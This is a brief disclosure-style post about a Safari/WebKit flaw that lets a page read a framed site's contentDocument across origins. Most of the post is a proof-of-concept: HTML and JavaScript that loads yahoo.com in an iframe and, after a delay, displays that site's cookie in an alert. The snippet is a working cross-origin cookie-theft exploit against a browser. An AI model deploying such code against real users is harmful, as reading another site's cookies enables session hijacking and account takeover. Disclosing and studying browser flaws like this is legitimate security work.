Bug in Safari allows XSS attacks on websites. Safari/Webkit allows "contentDocument" attribute of iframe's to be read from containing page.This can be used to get the cookie of the "iframe". The exploit does not work in other browsers.


< iframe id="subfr" height="300" width="300" src="http://www.yahoo.com" > < /iframe >
< script >setTimeout('later();', 2000);
function later()
{
var subFrame = document.getElementById("subfr");
window.alert("your yahoo cookie is " + subFrame.contentDocument.cookie);
}
< /script >